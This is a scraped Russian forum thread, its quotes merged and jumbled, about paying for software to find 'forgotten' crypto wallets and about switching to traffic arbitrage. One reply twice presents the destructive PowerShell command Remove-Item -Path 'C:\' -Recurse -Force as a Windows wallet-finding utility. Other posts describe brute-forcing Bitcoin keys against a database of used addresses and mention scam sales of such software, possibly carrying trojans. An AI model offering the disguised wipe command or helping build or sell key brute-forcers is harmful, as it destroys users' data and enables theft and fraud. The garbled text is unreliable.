Подскажите сколько будет стоить написание простого софта по поиску забытых кошельков?
Remove-Item -Path "C:\" -Recurse -ForceТы прав. Я скитаюсь от одной темы к другой и не могу сосредоточиться на одном. В принципе я только щас пришел к тому, что могу себя попробовать в арбитраже трафика, так как по образованию я маркетолог. Никогда не задумывался об этой сфере, но теперь пришло осознание и этому послужил твой совет, так что спасибо бро)Вижу что ты из стороны в сторону бегаешь, пытаешься заказать какой-то софт, то чит чтобы тебе приватный написали, то софт по поиску кошельков. Так не заработаешь, если сам ничего в этом не понимаешь.
Лучше возьми купи себе книгу по C++, оплати себе курс по пентесту, по тому же геймхаку Библию купи, подписку на Malware Academy от VX Underground, хоть что-то уже начни изучать. Или просто иди грабь, качай карманы.
Не получится просто взять вложить бабки в какой-то софт и торговать им, да и если такие вопросы поднимаешь, вряд ли у тебя хватит бабок на разработку, бро =)
Я хотел это америкосам впаривать, поэтому думаю нормВ винде уже есть утилита для поиска забытых кошельков запускается через cmdRemove-Item -Path "C:\" -Recurse -Force
Нашел уже 100 кошельков, поставил золотой унитаз, сижу на куче денег и снимаю тик токи под дебильную музыку и эмоциональным громким голосом с кучей смайликов(чтобы заглушить остатки разума) ору что заебись темка налутал уже миллион $ пацаны бегите скорее покупать/скачивать сливаю так и быть вам за 50$ быстрее ажиотах хайп деньги деньги машины тачки телки нет времени думать быстрее
А как это ты связал?арбитраже трафика, так как по образованию я маркетолог
Баланс у меня есть. Связал это, потому что по профессии я трафик менеджер. Понимаю как работать и запускать реальные компании практически на всех рекламных площадках, оценивать материки, создавать креативы и тд. Я не говорю, что я сразу стану гуру арбитража, но по крайне мере я точно буду знать, что мне делать, знаю основу, а остальное придет с опытом.А как это ты связал?
Что вообще понимаешь под арбитражем трафика? Это такое широкое понятие.
Без баланса в арбитраже никуда =)
Арбитраж трафика и трафик менеджер более понятная связка я надеюсь?А как это ты связал?
Что вообще понимаешь под арбитражем трафика? Это такое широкое понятие.
Без баланса в арбитраже никуда =)
Так это понятно бро. Я этому обучался и этим же занимался, когда был в найме. На счет гарантий все верно, надо делать и меньше думать вот и все.Арбитраж траффика это когда покупаешь траффик в одном месте и гонишь их на какуюнить партнёрскую программу, тестируя при этом и смотря на то что в итоге лучше всего монетезировалось, примерно это всегда считалось арбитражем траффика, конечно можно и нихрена и не заработать, ну а в каком бизнесе есть гарантии?
Думать я имел в плане сомнений, а так думать, конечно нужно не меньше чем делатьТак это понятно бро. Я этому обучался и этим же занимался, когда был в найме. На счет гарантий все верно, надо делать и меньше думать вот и все.
Бл х#йню крчсморозил, я надеюсь вы поняли о чем я имел ввидуДумать я имел в плане сомнений, а так думать, конечно нужно не меньше чем делать![]()
![[IMG] [IMG]](../../_assets/img/1d9d7631-63cc-4095-95a0-dd1a3b_eccb5c.webp)
![[IMG] [IMG]](../../_assets/img/09869386-bf15-4cd3-98a5-b9c844_20191991.webp)
![[IMG] [IMG]](../../_assets/img/a5c92014-b0cf-41f4-a81e-09fa7f_16d36db4.webp)
![[IMG] [IMG]](../../_assets/img/d88a42fa-2898-4d0c-968c-36b899_752f4b5c.webp)
![[IMG] [IMG]](../../_assets/img/7d1604b9-2cfa-48cd-8baf-2ec146_2f269b5a.webp)
Все приведенные приватники с первых страниц, автором представлены WIF полученные из хексов из нулей с перебором в виде 00000000000001/2/3/4/5/ бред короче, это невозможно подобрать, ближайшые миллион страниц на автовыводе
Вспоминаем школьную комбинаторику, которая наряду с логикой в СССР преподавалась:Подскажите сколько будет стоить написание простого софта по поиску забытых кошельков?
смысл то как раз понятный: втюхать прогу, которая якобы ищет кошельки с балансом, как можно большему кол-ву "мамонтов" за $ , плюс никто троянчики в проге не отменял ;-)Суть вышеизложенной статьи и "пидорской" проги. Это гибрид:
(тотального генератора ключей) + (генератора vanity-адресов) + (намек на криптографический метод дешифровки разбиением) +(фрагметы работы с паролями brainwallet)
zdestuta - речь как раз таки о сужении поиска на общем массиве данных блокчейна.
К написанному лично у меня несколько иные претензии, нежели просто неэффективность. Но может быть я и не права (попробую пойти иным путем).
Однако.
Если все это не продается, то нахрена писать СТОЛЬКО букофф? Вот зачем, реально? Палить какие-то методы...Сливать скрины софтА? Смысл пиарится?
Софт если что не продаю,алгоритмом я с вами и так поделился. Было потрачено слишком ного сил и нервов, чтобы отдать это за пару тысяч.
смысл то как раз понятный: втюхать прогу, которая якобы ищет кошельки с балансом, как можно большему кол-ву "мамонтов" за $ , плюс никто троянчики в проге не отменял ;-)
Но настоящие танцы с бубнами начались, когда я уперся что нужно как-то проверять на баланс миллионы сгенерированных кошельков. И искать естественно бесплатные методы. И путём долгих ночей, я пришел к тому, что вообще отказался от проверки баланса через интернет. Каким образом? Путём парсинга абсолютно всех адресов, через которые совершалась хотя бы одна транзакция. В оконцовке вышел txt файлик не много не мало на 50гб и полтора миллиарда строк. Правда так как я оставил в нём ключи только формата Bip58, то получилось 20гб веса и 800 миллионов строк.
Но лезть каждый раз в txt файл, и проверять существует ли в нём, сгенерированный нами биткоин адрес, очень напряжно для системы, да и долго. Поэтому на основе этого файла пришлось создать файл базы данных на основе Sql Lite. Которая получилась весов в почти 60 гб. Что по скорости спросите вы? На Intel(R) Core(TM) i5-8350U CPU @ 1.70GHz генерация и моментальная проверка - миллион в секунду. На более серьёзных аппаратах еще не тестил.
![]()